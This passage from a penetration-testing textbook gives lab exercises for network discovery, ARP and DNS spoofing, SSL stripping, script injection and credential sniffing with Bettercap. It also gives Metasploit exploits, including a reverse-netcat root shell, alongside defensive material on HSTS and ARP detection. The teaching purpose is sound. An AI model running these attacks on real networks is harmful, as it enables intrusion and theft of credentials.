After gaining access to the network through Wi-Fi, hackers will

move to the next stage of the attack which is discovering the
networks and looking for systems, Databases and application
vulnerabilities, in this chapter you will learn tools to discover the
network such as Nmap tool, launching man in the middle attacks
and more.
S_E_Oblako

3. Post Connection Attacks

After Gaining access to the network we are going to move to discovering the
network and what devices are connected to the network, we have three
methods to discover the network.
3.1. Network discovering
- Network discover command tell us all the devices that connected to the
network and the type and IP address of the device.

The wireless card should be in client mode and have IP address from the
network
Exercise 9: Using Network Discovery tool netdiscover
#netdiscover -i wlan0 -r 192.168.0.1/24
S_E_Oblako

Exercise 10: Using Network discovery tool arp-scan

- if you are facing problems with netdiscover (with Kali 2020.2 version
netdiscover is not stable and sometimes does not show any devices in
the scan ).
- arp-scan does the same job and it comes loaded part of kali
- To use arp-scan tool
#arp-scan –help
#arp-scan -I wlan0 192.168.0.0/24
Repeat the above command more than one time because of the nature of
arp protocol

3.2. Using NMAP tool

- Nmap is a network discovery tool that can be used to gather detailed
information about any client in the network, Nmap is a very large tool
and have many uses in penetration testing and there are dedicated
courses to teach Nmap.
- We shall have a look at some of Nmap features to discover connected
clients and gather more information about them.
- We are going to use Zenmap version of Nmap (Gui based Nmap tool).
- Prior to Kali version 2020.1 Zenmap comes part of Kali distribution and
no need to install it.
- Download zenmap
# cd Downloads
#wget https://nmap.org/dist/zenmap-7.80-1.noarch.rpm
S_E_Oblako

- Convert .rpm file using Alien to a .deb file

#apt-get update

#apt install alien

#alien #zenmap-7.80-1.noarch.rpm

- Install using dpkg

#dpkg -I zenmap_7.80_all.deb
S_E_Oblako

- Start zenmap
#zenmap
S_E_Oblako

Exercise 11: using Nmap

- In Kali type the following command to start Nmap tool
#zenmap
- In the Target field enter the IP address or a subnet as shown in the
screenshot below
S_E_Oblako
S_E_Oblako

Note
The above exercise is to make you familiar with NMAP tool. Nmap
is main tool that used in all vulnerability assessment tools that
hackers start with to discover open ports in servers. Open port means
a service that could be exploited and lead to server penetration. We
are going to use NMAP in other penetration tests throughout this
book.
S_E_Oblako

3.3. Man in the Middle Attacks (MiTM)

Man in the middle Attack is one in which the attacker secretly intercepts and
relays messages between two parties who believe they are communicating
directly with each other. MiTM attackers pose a serious threat to online
security because it gives the attacker the ability to capture and manipulate
sensitive information in real-time. The attack is a type of eavesdropping
(Eavesdropping is the unauthorized real-time interception of a private
communication, such as a phone call, instant message, videoconference, or
fax transmission. The term eavesdrop derives from the practice of standing
under the eaves of a house, listening to conversations inside) in which the
entire conversation is controlled by attacker. Sometimes referred to as session
hijacking attack, MiTM has a strong chance of success when the attacker can
impersonate each party to the satisfaction of the other.
A common method of executing a MiTM attack involve distributing malware
that provide attacker with access to the user’s Web browser and the data it
sends and receives during transactions and conversations. Once the attacker
has control, he can redirect users to fake site that looks like the site the user is
expecting to reach. The attacker can then create a connection to the real site
and act as a proxy to read, insert and modify the traffic between the user and
the legitimate site. Online banking and e-commerce sites are frequently the
target of MiTM attacks so that the attacker can capture login credentials and
other sensitive data.
Most cryptographic protocols include some of endpoint authentication
specifically, are made to prevent MiTM attacks. For example, the transport
layer security (TLS) protocol can be required to authenticate one or both
parties using mutually trusted certificate authority. Unless users take heed
warnings when suspected certificate is presented, however, MiTM attack can
still be carried with fake or forged certificates.
MiTM attacker can also exploit vulnerabilities in wireless router’s security
caused by weak or default passwords. For example, a malicious router, also
called evil twin or fake access point can be setup in a public place like a café
or hotel to intercept information traveling through the router.
Type of MiTM attacks:

ARP spoofing
DNS Spoofing
STP mangling
S_E_Oblako

DHCP Spoofing
ICMP redirection
And more

3.4. ARP Spoofing

Address Resolution Protocol (ARP) is very essential for computers
communications as it tell the client device who is the router, the protocol is
not secure, the client will accept any ARP packets saying that “I am the
router“, and start sending packets to that destination, this weakness in the
protocol is used to start ARP spoofing . ARP Spoofing is extremely hard to
protect against if the attacker has the wireless password.
S_E_Oblako

ARP Protocol main security issues:

- Each ARP Request/response is trusted.
- Client can accept response even if it did not sent request.
ARP Spoofing
We are going to do MiMT attack using APR spoofing by telling a client that
we are the router, in the same time we tell the Router that we are the clients.

Exercise 12: ARP Spoofing using arpspoof tool

- In this Exercise we are going to use the virtual environment that we
created in virtual box and we are going to spoof the Windows machine
from Kali Linux and let it direct all its packets to Kali Linux machine.
- Go to virtual Box and make sure that both Kali Linux and Windows
machine shows the following
S_E_Oblako

- Start both Kali and Windows virtual machines.

- In this exercise we are going to do arpspoof telling the windows
machine that kali is the router and another arpsoof command to tell the
router that Kali is the windows machine.
- Then we can use wireshark in Kali to see the traffic between the
windows machine and the router because the traffic is going through
Kali machine .
- In windows machine run the following command ( to see ARP table)
arp -a

- In Kali install arpspoof tool (dsniff)

#apt install dsniff
S_E_Oblako

- In Kali open terminal windows and type:

#arpspoof -i eth0 -t 10.0.2.6 -r 10.0.2.1
-i = is the interface in Kali linux that we are going to use to
make MiMT attack
-t = target machine IP address
-r = Router IP address

- Go to windows machine and run command arp -a again

S_E_Oblako

- Now we need to enable IP forwarding in Kali machine to allow it to

pass Windows machines packets to the router.
- Do not close the arpspoof terminals
- Open new terminal windows and type the following command
#echo 1 > /proc/sys/net/ipv4/ip_forward

- To Monitor the traffic start wireshark and start capturing

- In Windows 10 machine go to http site
S_E_Oblako

In Kali check wireshark and filter for http

S_E_Oblako

3.5. MiTM with Bettercap tool

BetterCAP is a powerful, flexible, and portable tool created to perform
various types of MITM attacks against a network, manipulate HTTP, HTTPS
and TCP traffic in real time, sniff for credentials and much more.
There are a lot of materials online, especially from the official bettercap
website, which document how the tool is used and some of the improvements
that have been done to it over the years..
Betterrcap website: www.bettercap.org

Exercise 13: Installing Bettercap tool

1. Start Kali terminal and update Kali Linux
#apt-get update
#apt-get install bettercap

2. Start bettercap by typing

#bettercap -iface eth0 (eth0 is the Kali interface that we are going to use for
Bettercap)

3- Type help to see the commands that can be used and the modules inside
bettercap tool and the status of each module if is running or not.
S_E_Oblako

4- To see how to use a module you can type help followed by the module
name
S_E_Oblako

5- For example if I want to see how to use net.recon module

6- Turn on the net.recon module then start Windows machine , you will see
that the module will discover the Windows machine.

7- Net.probe module send probe packets to all of the subnet that the
Bettercap reside on and net.recon record the responses from clients in a
nice table and enabling net.probe module will automatically start
net.recon module
8- Type help
S_E_Oblako

9- Type net.show

Exercise 14: ARP Spoofing with Bettercap

1. Start bettercap
2. Start arp spoof module

#bettercap -iface eth0

>help arp.spoof
S_E_Oblako

3. Set the arp.spoof parameter to fullduplex to monitor both, the

victim machine and the router

4. Set the target victim machine to be arp spoofed (windows machine)

S_E_Oblako

Note
you can change any module in better cap the same way, just type set
followed by the module name and then the parameter as shown in the
help.
You can use tab to autocomplete the parameter name.
5. Turn the module on

6. Go to Windows machine and type arp -a

7. To see the traffic of Windows machine you need to start another

Bettercap module which is net.sniff

>net.sniff on
S_E_Oblako

8. Stop arp.spoof module

S_E_Oblako

Exercise 15: Intercepting HTTP traffic with Bettercap

HTTP traffic is not encrypted so when Man in the middle attack initiated
against a target computer and that target is using http traffic to login to a site,
all his traffic will visible to the hacker running MiMT attack even he can see
his username and password. In the following exercise we are going to use
Bettercap to intercept traffic from virtual Windows machine. when the
windows user login to http website we will see his credentials because it is
not encrypted.
1. Start Kali and setup bettercap as shown in the screen shot below

2. In Windows machine open web browser and go to the following website

http://testing-ground.scraping.pro/login
login as admin and password 12345
S_E_Oblako

3. Look at the Bettercap output in Kali

S_E_Oblako
S_E_Oblako

Exercise 16: Automating Bettercap attacks using Caplets

Bettercap has a feature called “caplet” , this feature allow automation of any
job we need to do in Bettercap by typing the series of commands that
required to do the job in text editor then save the file under the root directory
with .cap extension. In the following exercise we are going to create .cap file
for the previous exercise of arp spoofing and calling the .cap file from
bettercap when we start Bttercap.

1. Open mousepad text editor in Kali

2. Inside mousepad type all the commands that entered in the
previous exercise in order to start arp spoofing and sniff the
result.

3. Save the file to the /root directory

4. Make sure that you exit previous Bettercap session by typing exit
5. Type #betttercap -iface eth0 -caplet arpspoof.cap
S_E_Oblako

6. To make sure that arp.spoof run with all required modules enabled
type >help
S_E_Oblako

7. To see all the available caplets that come with Better cap

#cd /usr/share/bettercap/caplets

8. We need to move the arpspoof caplet that we created to

/ usr/share/bettercap/caplets
S_E_Oblako

9. Modify the arpspoof caplet file to have more sniffing capabilities by

adding option to sniff local

#mousepad arpSpoof.cap
Inside the file add the following line
Set net.sniff.local true
S_E_Oblako

10- Save the file

11- To list all the Caplets that come part of bettercap
Start bettercap
#bettercap -iface eth0
>caplets.show
S_E_Oblako

Bypassing https
Bypassing https attack or in other words SSL Strip attack is a Man In The
Middle (MITM) Attack by which a website secured with HTTPS is
downgraded to HTTP, All traffic coming from the victim machine is routed
to a proxy which is created by the attacker to force the victim machine to use
HTTP instead of HTTPS. SSL strip was discovered by hackers through a
simple observation that most users are not coming to SSL websites by
directly typing in the URL or a bookmarked Https:// abc.com, visitors
connect to a non-SSL site and it gets redirected (HTTP 302 redirect), or they
will connect to a non-SSL site which have a link to SSL site and they click
that link. HSTS header is not a redirect instead, the website tells the user web
browser to use HTTPS to connect to website.
HSTS.
HSTS (HTTP Strict Transport Security) is a web security technique that helps
you protect against downgrade attacks, MiTM (Man in the middle) attacks,
and session hijacking. HSTS accomplishes this by forcing web browsers to
communicate over HTTPS and rejecting requests to use insecure HTTP.
Originally drafted in 2009 by a group of PayPal employees, HSTS was first
published in 2012. Today, the HSTS header is recognized by IETF as Internet
Standard and has specified it in RFC 6797.
Why HSTS?
Man in the middle attack works very well in public Wi-Fi or any Wi-Fi that
the attacker has access to, it is very easy for someone with knowledge and
tools to lunch man in the middle attack and see the traffic of a victim if it is
not encrypted, normally HTTPS encrypt the traffic from the victim web
browser to the website, but MiTM (Man In The Middle) attack also have
away to break HTTPS traffic by doing SSL stripping technique which is to
force the web browser to use HTTP instead of HTTPS. Here HSTS header
comes handy to protect HTTPS traffic from being downgraded by attacker to
HTTP. The Website contain a header that tells the victim web browser to use
only HTTPS to communicate with the website, the Web Browser then store
this information and next time the user connect to the Website, even if the
user type HTTP the browser automatically change it to HTTPS without
communicating with the Website and therefore the traffic cannot be
downgraded to HTTP and the SSL stripping will not work.
S_E_Oblako

SSL stripping technique through MIMT attack

How does HSTS Work?
If you want to enable HSTS on your website, first you must add an HTTPS
header to the server.
Here is the header you should add:
Strict-Transport-Security: max-gae=expireTime; includeSubDomains;
preload
As far as the header is concerned, entering max-age is a must. Basically, it is
the time for which you want HSTS on your site, it should be entered in
seconds.
Apart from the max-age, one can enter includeSubDomains and preload flags
if he wishes to. The flag includeSubDomains is entered to ensure that the
entire website gets the protection of HSTS umbrella including its
subdomains. Although it is not necessary to include it in the header, it is
highly recommended. The preload flag you see at the end of the header is
used to inform the browsers that website has been added in the HSTS
preload list. You should include preload only if you have preloaded your
domain(s). If not, leave it blank.
Once you add the header to your web server, it ensures that the connection is
made only via the HTTPS tunnel. However, this too has its own pitfall. The
web browsers will obey web server’s HSTS order only if the first visit comes
S_E_Oblako

by means of HTTPS protocol. If the first visit made is over an HTTP

connection, the browsers will reject the header.
To see the HSTS list in Chrome type the following in the Chrome
Chrome://net-internals/#hsts

Dynamic
In the First screenshot the site is set to a Dynamic mode which means that the
browser has been instructed to enable HSTS by an HTTP response header
(served over TLS) like the following:
Strict-Transport-Security: max-age=157680000; includeSubDomains ;
This is a vulnerable to an attack whereby the very first time the browser
requests the domain with http:// (not https://) an adversary intercepts the
communication.
S_E_Oblako

Static
As shown in the second screen shot of facebook.com query it set to static_sts
this is to overcome the weakness of Dynamic mode . The static mode allows
for hard-coding HSTS records directly into the browser's source. The header
is changed to indicate the administrator's intention:
Strict-Transport-Security: max-age=157680000; includeSubDomains;
preload
Note
the inclusion of preload at the end. The domain is then submitted for review.
If approved then it is added to the Chromium list and is also included in the
Firefox, Safari, and IE 11+Edge lists.
SSL Stripping attack conditions:

1. SSL stripping works only over http connection.

2. Dynamic HSTS feature allow the user connect to website via http
then redirect to https site and update the browser with the https link
so the next time the user call the site the web browser automatically
change the link to https – ssl strip attack will fail in this case.
3. Static HSTS web browser uses only https connect and therefore ssl
stripping attack will fail.
4. Some sites don’t have http version of the website and there is no
redirection so the user will see connection failed if he tries http the
S_E_Oblako

site.
S_E_Oblako

Exercise 17: SSL Stripping

There are Bettercap Caplets that comes preloaded, to see the available caplets
, Open file manager and go to /usr/share/bettercap/caplets

1. In this exercise we are going to use two caplets, the arpspoof caplet
and the hstshijsck caplet to downgrade https connections to http and
see the traffic in clear text. However most of websites comes with
preloaded lists of sites that they only connect with https and this
such as facebook , twitter linkedin and more and in this case ssl
strip attack will fail against these websites
2. Start both Windows and Kali virtual machines
3. In Kali start bettercap

#bettercap -iface eth0

>arpSpoof (to start arpspoof caplet that we created earlier)
>hstshijack/hstshijack
If no error seen in the output of hstshijack that is mean the caplet works
fine and can intercept any site that does not have static hsts header
S_E_Oblako

4. In Windows machine open Firefox web browser and clear cash of the
browser then go to a site that does not have static hsts such as
www.linkdin.com
5. See the output of bettercap sniffer
S_E_Oblako
S_E_Oblako

3.6. MITM DNS Spoofing

DNS server is responsible for converting the Domain name like Google.com
to an IP address so computer can communicate with Google.com. Man in the
Middle can run a DNS server inside his computer and resolve the Domain
Name that the user need to the IP address chosen by the hacker perpetrating
the MiTM attack, for example when a user type www.google.com in his
browser , the first thing his computer will do is to communicate with DNS
server asking about the IP address of www.goole.com. In MiTM DNS
spoofing attack the hacker will see the DNS request coming from the PC and
will respond to that request with a Fake IP address that redirect the user to
another website and not www.google.com, the user PC cannot verify the
DNS response it received from the hacker machine as a fake DNS server
because there is no authentication happened between the client and DNS
server.
DNS Spoofing
In the following exercise, we are going to have DNS server running in our
Kali machine and a web server running as well, then we are going to redirect
hacked machine to our web server.
DNS spoofing will not work against Gmail and websites that use HTTPS
with HSTS. The reason why DNS spoofing doesn't work against HSTS
websites is because modern browsers come with a list of websites that they
can only browse as HTTPS, the browser will refuse to open that website.
This will work against normal http and https websites that does not have hsts
header enabled.
S_E_Oblako

Exercise 18: DNS Spoofing

1. Start web server

#service apache2 start

#service -- status-all ( to make sure apache2 service is running )
(Web Server files are stored in /var/ www/html)

2. create new page in Kali Web server

For testing change the current index.html file to index.original and use Text
editor create text file called index and write anything inside the file then save
it as index.html inside /var/www/html

3. Test the website working by opening Firefox and enter the IP

address of Kali.
S_E_Oblako

4. From Windows virtual machine make sure that you can reach the
Kali website by entering the IP address of Kali in the web browser.

5- From Windows virtual machine go to a website that you would like to

redirect to Kali for example rad.infosec.ca

6- Setting up Bttercap to do DNS spoofing

#bettercap -iface eth0
>help dns.spoof
>set dns.spoof.all true
>set dns.spoof.address 10.0.2.23 (kali Ip address)
>set dns.spoof.domains rad.infosec.ca,www.scratchpads.eu,www.rad-
infosec.ca ( these are the websites that we will intercept and redirect to Kali
website)
>dns.spoof on
>arpSpoof (to run the arpSpoof caplet that we created)
S_E_Oblako

7- From Windows machine , open Firefox browser and clear cash

8- Make sure that Windows network setting is set to default

S_E_Oblako

9- Then enter www.radh-infosec.ca, you are going to get the Kali webpage
S_E_Oblako

The Bttercap sniffer shows that the dns query to www.rad-infosec was
spoofed and redirected to local Kali Machine.
If you enter rad-infosec.ca address which is https sites with hsts header that
stored in the web browser memory, then bettercap will attempt to respond but
it will fail because the website that kali presenting to the browser is non https
website , bettercap will be as follow
S_E_Oblako

3.7. MiTM Java code injection

Man in the middle attack tool Bettercap also allow us to inject java code to
the victim websites that he is visiting if the website is http or https that is not
using HSTS header, injecting Java script in the victim web browser is very
dangerous because depending on the Java code written we can accomplish
many thing in the victim machine.
In the following exercise we are going to use bettercap to inject java code that
we are going to create.

Exercise 19: MITM -Java Code injection

1. Create a java code

#cd /
#mousepad javacode
Enter: alert(‘TEST JAVA CODE INJECTION’); and save the file as
javacode.js

2. Include the Javacode.js file in hstshijack caplet

#cd /usr/share/bettercap/caplets/hstshijack

3. Modify the hstshijack.cap file by adding *:/root/javacode.js to the

line pf set hstshijack.payload as shown in the screen shot below

Save the file

S_E_Oblako

4. Start bettercap with arpSpoof caplet and hstshijack caplet

5. From windows machine go to http site, you will notice the java alert
will be displayed
S_E_Oblako

6. Go to https site that does not have static hsts ( web browser cash
must be cleared)
S_E_Oblako

3.8. MIMT Attack in Real Network

Bettercap tool works the same way in real network (LAN or Wi-Fi) as in
virtual networks (through the above exercises) with the following notes
regards real network:

1. External (USB) Wi-Fi card must be used as the internal Wi-Fi card
cannot inject packets to poison ARP.

2. In above picture 192.168.0.37 is the attacker card and sending ARP

to 192.168.0.38 The victim machine
3. Attack machine 192.168.0.37 also talking to the real router
192.168.0.1 to forward the victim traffic to itself.
4. Autoscan tool is used to know who is out there in the network that
can be targeted in MIMT attack.
5. The attack may take longer time to start because the victim machine
already connected to router through its ARP table.

6. Victim machine can be PC or mobile phone or any IP device.

7. Here is some Wireshark captures that shows clearly what is
happening
S_E_Oblako

we can search for string in wireshark

8. For more info about Wireshark go to :

https://www.wireshark.org/docs/ where you can find documents,
S_E_Oblako

videos and tutorials about Wireshark.

9. We can use Wireshark to discover suspicions traffic in the network
for example if someone scanning the network we can see a lot of
ARP broadcasts.
S_E_Oblako

3.9. Detecting ARP storms by Wireshark

ARP poising attack start with ARP scanning for the whole subnet to see live
devices in the network, this can be seen very easily in Wireshark as an ARP
storm. Wireshark Expert information provide a warning about ARP storm
detected.

Exercise 20: Detecting ARP storms with Wireshark

In this exercise we are going to run a netdiscover tool which does ARP scan
and monitor the network with wireshark to discover the ARP storm created
by ARP scan

1. Setup Wireshark to filter the traffic in order to see ARP prtocol

2. In Wireshark enable ARP broadcast, go to Edit -> Preferences -
>Protocols /ARP/RARP and enable Detect ARP request storms

3. In Kali machine run the following command to scan the network

#netdiscover –t eth0 –r <subnet>

S_E_Oblako

ARP broadcast is very visible in Wireshark that someone is scanning the

network.

4. Wireshark can tell us about MIMT attack

5. Go to Wireshark captured packets and go to Analyze -> Expert
Information, you can see the following warning

Here Wireshark telling us 10.0.2.4 machine is duplicating 10.0.2.1 (router)

S_E_Oblako

3.10. Preventing ARP Poisoning

ARP Poisoning, A.K.A. Man-In-The-Middle (MiTM), is an effective attack if
proper mitigation techniques have not been implemented. MiTM attack
requires the attacker to be on the same network as the intended victims, an
attack would need to be initiated from the inside of the network. There are
many tools and techniques that can be used to detect and prevent ARP
poisoning such as Intrusion Detection and Prevention systems ( IDS/IPS) ,
Layer 2 switches with features to track mac addresses connected to its ports
Use ARP spoofing for something good
ARP spoofing can also be used for good purposes. Very often we are being
able to see wireless networks that are redirecting us to signup page when we
want to access wireless LAN or internet access across this Wi-Fi. Network
registration tools may redirect unregistered hosts to a signup page before
allowing them full access to the network. It is mostly used in public internet
such as Airports, Malls, hotels, and other sorts of networks to control the
access of mobile devices to the Internet and sometimes make users pay for
the Internet across special signup page. For that propose they are redirected
using ARP spoofing to a device known as a head end processor (HEP).
ARP spoofing can be used to implement redundancy of network services. A
backup server may use ARP spoofing to take over for a server that has
crashed and transparently offer redundancy.
Cisco IOS 12.2 and up switches have a feature to monitor ARP spoofing but
need DHCP snooping also enabled
Intrusion Detection/Prevention Systems (IDS/IPS):
IDS/IPSs can be divided as host based and network based. Host based
IDS/IPS are installed on hosts and detect or protect only the host. Network
based IDS/IPS listen to mirror port of the switch or some ports of the switch.
They can detect or protect the hosts connected to those ports. IDS systems
can detect ARP attacks and inform the administrator with the generation of an
appropriate alert or alarm. The main problem with IDS is that they tend to
generate a high number of false positives (alarms that turn out to be not part
of attacks).
S_E_Oblako

4
Gaining Access (Server Side)

In this chapter we will learn how to find vulnerabilities in servers

and how to exploit them to gain access and control to the server,
through manual exercises that uses Nmap (Zenmap application in
Kali Linux) then searching the internet for the vulnerability exploit
then using Metsaploit framework which automate the whole
process of finding the vulnerability and exploiting it .
S_E_Oblako

4. Gaining Access (Server Side)

After getting inside the network we need to see how to gain access to
computing devices inside that network. Computing device such as Server,
web server, Client PC, Router, smartphone, tablet, TV.
Gaining access require a lot of information gathering about the client or the
server, in our Exercises in this section we are going to focus in two
approaches:
Server Side

Do not need user interaction all we need is target IP.

Start information gathering by finding open ports, OS, installed
services (applications).
Quite simple if the target is in the same network.
If target has a domain name, then a simple ping will return his IP
address.

Client side
Gaining access to someone computing devices require more information
gathering and social engineering skills to make user interaction such as
opening a file or clicking on a link.
4.1. Server-Side attacks
Basic Information gathering and exploitation

Exercise 21: Basic Information Gathering using Zenmap

1. In this Exercise we are going to use ( Zenmap ) to do information
gathering about a server that we know its IP address.
2. Zenmap will give us all the open ports and running services in this
server
3. We are going to target the second Linux virtual machine installed in
our virtual environment.
4. In Virtual Box start MetaSploitable machine.
5. Login to the machine user:
6. msfadmin/msfadmin
7. Type
S_E_Oblako

#uname -a ( this give you the server name )

8. Check the machine IP address using command #ifconfig

9. In Kali machine open Zenmap application and enter the IP address
of the Metaploite machine and choose intense scan
S_E_Oblako

10. In the output of Zenmap check the open ports (services) given and
check the internet for these services vulnerability, backdoors and
exploit.
11. We are going to show two examples from the output of Zenmap:
12. Ftp service clearly shows that anonymous can access the server
through ftp without the need for username and password
13. Install ftp client like filezilla (https://filezilla-project.org) to start
browsing the files inside that server
14. If you dig further in the internet about the ftp version weaknesses
you might find a tool that allow you to have access to the server
itself, not only to the ftp section of it.
15. Port 512/TCP is open and has a service of netkit-rsh rexecd which
is a remote Process execution service in Linux systems.
S_E_Oblako
S_E_Oblako

Exercise 22: Exploit RSH client vulnerability

1. If we search google about other vulnerability that discovered by
Zenmap such as netkit-rsh we find that, it is a remote shell access
services and we can find tools in the internet exploit it.
S_E_Oblako

2. This service basically allows us to access the server remotely and

let us execute remote commands in the target computer.
3. If we continue search about netkit-rsh we will find more info and
client software package.
S_E_Oblako

4. Install rsh-client in Kali-Linux machine.

#apt-get install rsh-client

5. We are going to use rsh-client to access the Metasploitable machine

using command rlogin as follow in the screenshot .

#rlogin –l root <target machine IP address>

4.2. Exploiting Basic vulnerability

S_E_Oblako

Exercise 23: Exploit Ftp vulnerability

1. Start Kali Linux machine
2. Start Metasploitable Linux Machine and check its IP address
3. From Kali machine run Zenmap against the IP address of the
Metasploitable machine to check vulnerability.

4. Google vsftpd 2.3.4 to see if there are any backdoors of this process
and if there is exploit to use that backdoor
5. Output shows that there is backdoor
S_E_Oblako

6. Copy the name of the Module that can open the back door
7. Go to Kali Linux terminal and type
8. #msfconsole to start the Metasploit
S_E_Oblako

msf>search vsftpd

9. Type: msf> use exploit/unix/ftp/vsftpd_234_backdoor

S_E_Oblako

10. After starting the exploit module type > show options

11. From the option command we can see that there are two options,
one is the RHOST (Remote Host) and RPORT ( Remote Port) so
we are going to connect to the machine using the RHOST by giving
the exploit the IP address of the target machine
12. Input the IP address of target machine > set RHOST 10.0.2.8
S_E_Oblako

13. Start the exploit by typing > exploit

14. As you can see from the above screen shot, we have a root access to
the target machine, we can do anything we want in that machine.

4.3. Code Execution vulnerabilities

So far, we have seen access through, default passwords, services
misconfiguration, and backdoors.
In this section we are going to see how to access a machine using
S_E_Oblako

vulnerabilities that exist in a certain service through command execution that

will give us full access to the target machine. We are going to use reverse
connection, i.e. we are going to setup the target machine to connect to our
attack machine using the port we chose, this way we can work around
firewalls. (normally firewalls set to refuse any connection from external to
internal but allow connection from internal to external.

Exercise 24: Exploiting Code Execution Vulnerability

1. Start zenmap in Kali Linux machine to find vulnerability

2. Google for Samba service 3.x in port 139 to see its vulnerability
3. Take the result from Rapid7 website (Rapid 7 is the same company
that developed the Metasploit framework)
S_E_Oblako
S_E_Oblako

4. Start Metasploit by typing #msfconsole

5. At the msf console type > use exploit/multi/samba/usermap_script

6. after the exploit start, type #show options

Note
Using the exploits and running them is always the same, even if you
get new exploit by following these steps you can run any exploits,
just remember to check the options of the exploits and what they can
allow you to do in the target machine.
S_E_Oblako

7. Setup the RHOST with the target machine using command

>set RHOST 10.0.2.8

8. Inject a payload into the target machine to exploit flaw in the

S_E_Oblako

Samba program.
Samba is a file and print services for all clients using
the SMB/CIFS protocol, such as all versions of DOS
and Windows, OS/2, Linux, and many others. Samba
is an important component to seamlessly integrate
Linux/Unix Servers and Desktops into Active
Directory environments). It can function both as a
domain controller or as a regular domain member.
Samba version that running in the Metasploitable
machine has a vulnerability of buffer overflow that
allow adversaries to run small code inside it, we need
to create a PAYLOAD and run it in the target
computer, the Payload will let us run Linux commands
in the target machine.
9. To see the different type of payloads type >show payloads

10. Notice that there are bind payloads and there are reverse payloads

Payloads: are small paces of code that will be executed inside the target
machine once the vulnerability exploited.
S_E_Oblako

11. We are going to use reverse payload to bypass the firewall in the
target network.

The reverse payload is that the victim machine initiates the connection
to the attack machine (Kali Linux).

12. Use msfconsole in kali to setup the port and IP address of Kali
machine that the victim should make the connection to.

Type
>set PAYLOAD cmd/unix/reverse_netcat
>show options

13. The LHOST is the attacker machine IP address (Kali ), the LPORT
is to setup the port
14. Check Kali machine IP address
S_E_Oblako

15. Set LHOST and LPORT

>set LHOST <IP address of Kali Machine>

>set LPORT < port 80>
>set RHOST <IP address of victim machine)

16. Show Options

17. Run the exploit

18. >exploit
S_E_Oblako

Now the Target machine is connected to my machine on port 80 and I have

access as root (as you can see from the id and uname -a commands) this mean
I have a full access to the target machine.
S_E_Oblako

5.
Vulnerability Management

Vulnerability scanning is an organized approach to the testing,

identification, analysis and reporting of potential security issues on
a network. I.T. department must run vulnerability scans on a
weekly basis in order to be save from any new issues that might
appear in OS, Applications and networks. There are many tools to
do Vulnerability scanning such as Nessus, Qualys, Rapid7 Nexpuse
and more. In this section we are going to install and run Nexpuse
vulnerability scanning tool.
S_E_Oblako

5. Vulnerability Scanning
Vulnerability scanning is an inspection of the potential points of exploit on a
computer or network to identify security holes.
A vulnerability scan detects and classifies system weaknesses in computers,
networks and communications equipment and predicts the effectiveness of
countermeasures. A scan may be performed by the organization IT
department or by a security service provider, possibly as a condition imposed
by some authority. Vulnerability scans are also used by attackers looking for
points of entry.
A vulnerability scanner runs from the end point of the person inspecting the
attack surface in question. The software compares details about the target
attack surface to a database of information about known security holes in
services and ports, anomalies in packet construction, and potential paths to
exploitable programs or scripts. The scanner software attempts to exploit
each vulnerability that is discovered.
Running a vulnerability scan can pose its own risks as it is inherently
intrusive on the target machine’s running code. As a result, the scan can
cause issues such as errors and reboots, reducing productivity.
There are two approaches to vulnerability scanning, authenticated and
unauthenticated scans. In the unauthenticated method, the tester performs the
scan as an intruder would, without trusted access to the network. Such a scan
reveals vulnerabilities that can be accessed without logging into the network.
In an authenticated scan, the tester login as a network user, revealing the
vulnerabilities that are accessible to a trusted user, or an intruder that has
gained access as a trusted user.
5.1. Basic Vulnerability detection methods
Vulnerability detection method start by vulnerability scanning software read
the target banner or application version or checking a protocol version that
the target system is using. Then the vulnerability scanning software checks
the vulnerability databases, by looking at these databases the vulnerability
scanning software can know if there is a weakness in that application, Service
or OS.
Protocols that applications uses in communications with client may have
vulnerability also, for example a week encryption method in communication
protocol can be exploited easily, The vulnerability scanner can send different
packets in the network to examines the behavior of the service against these
S_E_Oblako

packets and examines whither the behavior is similar to the behavior of

vulnerable services.
Wrong configurations may cause weaknesses for example if you configure
your web authentication mechanism to allow three-character password, it can
very easily crack by attackers.
5.2. Vulnerability Scanning software
Vulnerability Scanner is a software designed to assess computers systems,
networks, and applications for known weaknesses. These scanner is used to
discover the weak points or poorly constructed parts, utilized for the
identification and detection of vulnerabilities related to mis-configured assets
or faulty software that reside in a network based asset such as firewall, router,
web server, application server, etc.
There are many vulnerability scanning software, here is a list of will-known
vulnerability scanning software:

Nmap NSE: Nmap is port scanning software but with the help of
Nmap Scripting Engine NSE it is possible to use Nmap as a
vulnerability scanner.
Nessus: Nessus is a vulnerability assessment software developed by
Tenable Network security is one of the most popular and capable
vulnerability scanners. Nessus Professional is the commercial
product in addition a free Nessus community version is also
available, but it is limited and can only licenses for home networks.

Nessus allow scan for:

Patch test without using agents.

Detecting misconfiguration.
Port scan.
Service detection.
Trying for known credentials.
Ability to use exploit.
Ability to look for credentials.
70,000+ plugins.
Reporting.

Microsoft MBSA: Microsoft Baseline security Analyzer provide a

S_E_Oblako

streamline method to identify missing security updates and common

security misconfigurations. MBSA is only for Microsoft systems
and it is not an overall vulnerability scanner at all.
Nexpose: is a commercial tool developed by Rapid7 the producers
of Metasploit framework, it is vulnerability scanner which aimed to
support the entire Vulnerability assessment process lifecycle
including discovery, detection, verification, risk classification,
impact analysis , Reporting and mitigation.
OpenVas: is open Source vulnerability scanner that was forked
from the last free version of Nessus after that tool went proprietary
in 2005.
SAINT: Commercial Vulnerability assessment tool like Nessus
used to be free and open source but is now a commercial product.
SAINT runs only in Linux and Mac OS and it don’t support or run
on Windows.
GFI LanGuard: is a network security and vulnerability Scanner
designed to help with Patch Management.
QualysGuard: is a popular code based SAAS (software as a
Service) vulnerability management, its web-based UI offers network
discovery and mapping assists prioritization vulnerability
assessment reporting and remediation tracking according to
business risks.

5.3. Vulnerability Database

A vulnerability database is a platform aimed at collecting, maintaining, and
disseminating information about discovered vulnerabilities targeting
computer systems. The database will customarily describe the identified
vulnerability, assess the potential impact on affected systems, and any
workarounds or updates to mitigate the issue. For a hacker to surmount a
system's information assurance, three elements must apply: a vulnerability
within the system, access to the vulnerability, and the ability to exploit the
vulnerability. Here the most known vulnerability databases:

Open Source Vulnerability Database (OSVDB) (

http://osvdb.org)
S_E_Oblako

The Open Source Vulnerability Database provides an accurate,

technical, and unbiased index on vulnerability security. The
comprehensive database cataloged over 121,000 vulnerabilities
spanning a 113-year period. The OSVDB was founded in August 2002
and was launched in March 2004. In its primitive beginning, newly
identified vulnerabilities were investigated by site members and
explanations were detailed on the website. However, as the necessity for
the service thrived, the need for dedicated staff resulted in the inception
of the Open Security Foundation (OSF) and the OSVDB was shut down
in April 2016; a paid service VulnDB took their place.

